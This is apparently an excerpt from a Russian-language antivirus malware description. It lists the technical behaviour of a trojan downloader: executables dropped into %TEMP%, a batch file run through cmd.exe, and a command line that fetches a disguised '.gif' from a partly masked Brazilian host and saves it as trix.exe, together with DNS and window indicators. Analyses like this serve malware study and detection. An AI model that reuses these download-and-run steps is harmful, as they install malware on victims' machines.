Техническая информация
- '%TEMP%\trix.exe'
- '%TEMP%\dido.exe' http://www.bo####ista.com.br/images/boi.gif ""%TEMP%\trix.exe""
- '%TEMP%\prissy.exe'
- '%TEMP%\trix.exe' (загружен из сети Интернет)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\load1_link.bat" "
- %TEMP%\1.tmp\load1_link.bat
- %TEMP%\trix.exe
- %TEMP%\dido.exe
- %TEMP%\prissy.exe
- %TEMP%\1.tmp\load1_link.bat
- 'www.bo####ista.com.br':80
- www.bo####ista.com.br/images/boi.gif
- DNS ASK www.bo####ista.com.br
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'